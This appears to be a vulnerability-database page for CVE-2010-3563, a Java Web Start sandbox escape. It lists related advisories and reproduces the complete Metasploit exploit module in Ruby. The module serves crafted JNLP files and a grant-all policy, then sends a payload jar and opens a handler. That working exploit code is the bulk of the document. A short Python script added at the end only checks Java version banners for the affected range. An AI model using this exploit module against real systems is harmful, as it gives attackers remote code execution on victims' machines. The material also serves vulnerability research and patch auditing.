| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2010-3563 | 22 Jan 2011 00:00 | – | circl |
| Sun Java Web Start BasicServiceImpl Remote Code Execution (CVE-2010-3563) | 15 Nov 2011 00:00 | – | checkpoint_advisories |
| CVE-2010-3563 | 19 Oct 2010 21:00 | – | cve |
| CVE-2010-3563 | 19 Oct 2010 21:00 | – | cvelist |
| DSquare Exploit Pack: D2SEC_JAVAWS3 | 19 Oct 2010 22:00 | – | d2 |
| Sun Java Web Start BasicServiceImpl - Remote Code Execution (Metasploit) | 22 Jan 2011 00:00 | – | exploitdb |
| GLSA-201111-02 : Oracle JRE/JDK: Multiple vulnerabilities (BEAST) | 7 Nov 2011 00:00 | – | nessus |
| Oracle Java SE Multiple Vulnerabilities (October 2010 CPU) | 15 Oct 2010 00:00 | – | nessus |
| Oracle Java SE Multiple Vulnerabilities (October 2010 CPU) (Unix) | 22 Feb 2013 00:00 | – | nessus |
| RHEL 4 / 5 : java-1.6.0-sun (RHSA-2010:0770) | 15 Oct 2010 00:00 | – | nessus |
```ruby
##
# $Id: java_basicservice_impl.rb 10488 2010-09-26 23:55:03Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer

  # Internet explorer freaks out and shows the scary yellow info bar if this
  # is in an iframe. The exploit itself also creates a couple of scary popup
  # windows about "downloading application" that I haven't been able to
  # figure out how to prevent. For both of these reasons, don't include it
  # in Browser Autopwn.
  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit',
      'Description'    => %q{
        This module exploits a vulnerability in Java Runtime Environment
        that allows an attacker to escape the Java Sandbox. By injecting
        a parameter into a javaws call within the BasicServiceImpl class
        the default java sandbox policy file can be therefore overwritten.
        The vulnerability affects version 6 prior to update 22.

        NOTE: Exploiting this vulnerability causes several sinister-looking
        popup windows saying that Java is "Downloading application."
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Matthias Kaiser', # Discovery, PoC, metasploit module
        'egypt'            # metasploit module
      ],
      'Version'        => '$Revision: 10488 $',
      'References'     =>
        [
          [ 'CVE', '2010-3563' ],
          [ 'OSVDB', '69043' ],
          [ 'URL', 'http://mk41ser.blogspot.com' ],
        ],
      'Platform'       => [ 'java', 'win' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Windows x86',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'win',
            }
          ],
          [ 'Generic (Java Payload)',
            {
              'Arch'     => ARCH_JAVA,
              'Platform' => 'java',
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 12 2010'
    ))
  end

  def on_request_uri( cli, request )
    jpath = get_uri

    case request.uri
    when /java.security.policy/
      print_status("Checking with HEAD")
      ack = "OK"
      send_response(cli, ack, { 'Content-Type' => 'application/x-java-jnlp-file' })
    when /all.policy/
      all = "grant {permission java.security.AllPermission;};\n"
      print_status("Sending all.policy")
      send_response(cli, all, { 'Content-Type' => 'application/octet-stream' })
    when /init.jnlp/
      init = %Q|<?xml version="1.0" encoding="UTF-8"?>
<jnlp href="#{jpath}/init.jnlp" version="1">
#{jnlp_info}
<application-desc main-class="BasicServiceExploit">
<argument>#{jpath}</argument>
</application-desc>
</jnlp>
|
      print_status("Sending init.jnlp")
      send_response(cli, init, { 'Content-Type' => 'application/x-java-jnlp-file' })
    when /exploit.jnlp/
      expl = %Q|<?xml version="1.0" encoding="UTF-8"?>
<jnlp href="#{jpath}/exploit.jnlp" version="1">
#{jnlp_info}
<application-desc main-class="Exploit"/>
</jnlp>
|
      print_status("Sending exploit.jnlp")
      send_response(cli, expl, { 'Content-Type' => 'application/x-java-jnlp-file' })
    when /\.jar$/i
      p = regenerate_payload(cli)
      paths = [
        [ "BasicServiceExploit.class" ],
        [ "Exploit.class" ],
      ]
      dir = [ Msf::Config.data_directory, "exploits", "cve-2010-3563" ]
      jar = p.encoded_jar
      jar.add_files(paths, dir)
      print_status("Sending Jar file to #{cli.peerhost}:#{cli.peerport}...")
      send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })
      handler(cli)
    else
      print_status("Sending redirect to init.jnlp")
      send_redirect(cli, get_resource() + '/init.jnlp', '')
    end
  end

  def jnlp_info
    %Q|<information>
<title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
<vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
<description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
</information>
<resources>
<java version="1.6+"/>
<jar href="#{get_uri}/exploit.jar"/>
</resources>
|
  end
end
```
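The module description states the affected range plainly: Java 6 prior to update 22. The following Python is an added example, not part of the Metasploit module above or of the Vulners record, that turns that statement into an inventory check: it parses a `java -version` banner (or a bare `1.6.0_NN` string) and reports whether the runtime falls inside the affected range. The banner embedded below is constructed for the demonstration, and the `1.major.micro_update` version format is assumed to be what the runtime prints; a banner that does not parse yields `None` rather than "not affected" so that unknown hosts are not silently counted as patched.

```python
import re

# Range named in the module description: Java 6 releases before update 22.
AFFECTED_MAJOR_MINOR = (1, 6)
FIXED_UPDATE = 22

# Matches either a bare version string ("1.6.0_21") or the first line of a
# `java -version` banner ('java version "1.6.0_21"'). The update number is
# optional; a trailing build tag such as "-b07" is ignored.
_VERSION_RE = re.compile(r'(?:java version\s+)?"?(\d+)\.(\d+)\.(\d+)(?:_(\d+))?"?')


def parse_java_version(text):
    """Return (major, minor, micro, update) parsed from `text`, or None.

    The update defaults to 0 when the string carries no "_NN" suffix.
    """
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, micro, update = m.groups()
    return (int(major), int(minor), int(micro), int(update) if update else 0)


def is_affected(text):
    """Classify a version string or banner.

    True  -> Java 6 below update 22 (inside the range the module names)
    False -> parsed, but outside that range (other major/minor, or 6u22+)
    None  -> no version recognised; treat as "cannot assess", not as safe
    """
    parsed = parse_java_version(text)
    if parsed is None:
        return None
    major, minor, _micro, update = parsed
    return (major, minor) == AFFECTED_MAJOR_MINOR and update < FIXED_UPDATE


# Constructed sample banner in the shape `java -version` prints on a Java 6 host.
SAMPLE_BANNER = (
    'java version "1.6.0_21"\n'
    'Java(TM) SE Runtime Environment (build 1.6.0_21-b07)\n'
    'Java HotSpot(TM) Client VM (build 17.0-b17, mixed mode, sharing)\n'
)


if __name__ == "__main__":
    for label, text in [
        ("constructed banner", SAMPLE_BANNER),
        ("bare string", "1.6.0_22"),
        ("older major", "1.5.0_26"),
        ("unparseable", "no java here"),
    ]:
        print(f"{label:20s} -> affected={is_affected(text)}")
```

Run it against the output of `java -version` collected from each host; anything classified `True` is inside the range the module description names, and anything classified `None` needs a manual look rather than being filed as patched.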